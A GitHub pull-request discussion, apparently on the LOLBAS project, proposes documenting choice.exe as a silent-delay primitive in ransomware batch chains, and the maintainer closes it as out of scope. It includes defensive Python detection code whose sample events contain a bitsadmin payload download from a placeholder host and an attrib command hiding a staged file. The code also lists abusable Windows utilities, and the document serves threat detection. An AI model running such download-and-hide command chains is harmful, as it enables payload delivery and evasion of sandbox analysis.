
Conversation

@4renSick

This PR documents choice.exe as a helper binary that can be abused for execution-flow
and timing control in malicious batch scripts.

While choice.exe does not execute payloads directly, it has been observed in
real-world ransomware activity (e.g., WastedLocker) as part of command chains
used to introduce silent delays before file manipulation or cleanup actions.

The included examples demonstrate how attackers can combine choice.exe with
other trusted Windows utilities (such as bitsadmin or attrib) to evade sandbox
analysis and reduce behavioral noise.

Reference:
SentinelOne – WastedLocker ransomware abusing NTFS file attributes
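The timing primitive the PR describes is the unattended form of choice.exe: `choice /C Y /N /D Y /T 5 > nul` presents a hidden Y prompt, takes the default after the /T timeout and returns, so a batch script sleeps for five seconds without calling timeout.exe or ping. The block below is an added example, not code from the pull request or from the LOLBAS project: it parses that idiom out of a process command line and pairs it with follow-up LOLBIN launches under the same parent process, which is the check a defender would run over process-creation telemetry. The event records, the set of follow-up images and the two-second slack window are constructed assumptions.

```python
"""Spot choice.exe used as an unattended sleep, then correlate it with LOLBIN
activity launched by the same parent shortly after the delay elapses."""
import ntpath
import re
from typing import Optional

# Constructed process-creation records in a Sysmon-like shape (not real
# telemetry). ts is seconds from an arbitrary origin; ppid is the parent
# cmd.exe that runs the chained batch command.
SAMPLE_EVENTS = [
    {"ts": 0.0, "ppid": 4100, "image": r"C:\Windows\System32\choice.exe",
     "cmdline": "choice /c y /n /d y /t 5"},
    {"ts": 5.1, "ppid": 4100, "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r"attrib +h +s C:\Users\Public\stage.bin"},
    {"ts": 5.2, "ppid": 4100, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high "
                r"http://example.invalid/p.bin C:\Users\Public\p.bin"},
    # Interactive prompt: no /T, so the script blocks on a keypress; this is
    # ordinary batch usage, not a timing primitive.
    {"ts": 60.0, "ppid": 7788, "image": r"C:\Windows\System32\choice.exe",
     "cmdline": 'choice /c yn /m "Continue?"'},
    {"ts": 61.0, "ppid": 7788, "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r"attrib -r C:\Users\Public\notes.txt"},
    # Unattended sleep with nothing notable after it: low signal on its own.
    {"ts": 100.0, "ppid": 9000, "image": r"C:\Windows\System32\choice.exe",
     "cmdline": "choice /t 30 /d n /n"},
]

# Assumed set of trusted utilities worth pairing with a preceding delay.
FOLLOWUP_IMAGES = {"attrib.exe", "bitsadmin.exe", "certutil.exe",
                   "icacls.exe", "vssadmin.exe", "wevtutil.exe"}

# /T accepts the timeout as "/T 5" or "/T:5"; /D supplies the default answer.
_TIMEOUT = re.compile(r"(?<![\w/])/t[:\s]+(\d+)", re.I)
_DEFAULT = re.compile(r"(?<![\w/])/d(?:[:\s]|$)", re.I)


def choice_delay(cmdline: str) -> Optional[int]:
    """Return the sleep length in seconds when this choice.exe command line is
    an unattended delay (/T timeout plus a /D default, so no keypress is
    needed); return None for interactive prompts or a /T without /D."""
    m = _TIMEOUT.search(cmdline)
    if not m or not _DEFAULT.search(cmdline):
        return None
    return int(m.group(1))


def correlate(events, slack: float = 2.0):
    """Pair each unattended choice.exe delay with later launches of
    FOLLOWUP_IMAGES under the same parent that arrive no later than the
    delay plus `slack` seconds. Returns one hit per follow-up process."""
    hits = []
    ordered = sorted(events, key=lambda e: e["ts"])
    for i, ev in enumerate(ordered):
        if ntpath.basename(ev["image"]).lower() != "choice.exe":
            continue
        delay = choice_delay(ev["cmdline"])
        if delay is None:
            continue
        deadline = ev["ts"] + delay + slack
        for nxt in ordered[i + 1:]:
            if nxt["ts"] > deadline:
                break  # events are time-ordered; nothing later can qualify
            if nxt["ppid"] != ev["ppid"]:
                continue
            image = ntpath.basename(nxt["image"]).lower()
            if image in FOLLOWUP_IMAGES:
                hits.append({"ppid": ev["ppid"], "delay_s": delay,
                             "followup": image,
                             "followup_cmdline": nxt["cmdline"]})
    return hits


if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS):
        print(f"ppid {hit['ppid']}: {hit['delay_s']}s choice.exe delay "
              f"followed by {hit['followup']}: {hit['followup_cmdline']}")
```

Run stand-alone, the script reports the two launches under ppid 4100 (attrib.exe and bitsadmin.exe) and nothing for the interactive prompt or the idle delay. Requiring /D alongside /T is what separates a scripted sleep from a genuine prompt; pairing it with what the same parent runs next is what lifts the signal above the volume of ordinary batch usage.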

4renSick requested a review from a team as a code owner on December 20, 2025 at 11:38.
4renSick changed the title from "Choice.exe" to "Create Choice.exe" on Dec 20, 2025.
@4renSick (Author)

Thanks for reviewing.
This entry documents choice.exe as a helper binary used for execution flow
and timing control, with a real-world reference from SentinelOne’s
WastedLocker analysis. Happy to update or adjust if needed.

@wietze (Member) commented Jan 3, 2026

Hey @4renSick , thank you for your suggestion.

Having reviewed your submission, I believe that unfortunately it does not meet the criteria this project has set out. That doesn't mean the functionality you documented is not useful for e.g. red teamers, but if my assessment is right, this entry would unfortunately not be the right fit for this project. For that reason I'm closing this pull request now; if you think I'm wrong, though, please comment in here and I'll reopen the pull request.

wietze closed this on Jan 3, 2026.

@4renSick (Author) commented Jan 3, 2026

Thank you @wietze for taking the time to review the submission and for the detailed feedback.
I understand your assessment regarding the scope and criteria of the project, and I agree that choice.exe primarily serves as a helper utility rather than enabling direct execution or payload retrieval on its own.
My intent with the submission was to document how attackers may abuse it as a control primitive in multi-stage batch-based tradecraft, but I appreciate that this does not align with the core inclusion requirements of LOLBAS.
I’m continuing my research in this area and hope that in the future I’ll be able to discover and contribute new binaries that better fit the project’s criteria.
Thanks again for the review and for maintaining the quality standards of the project.
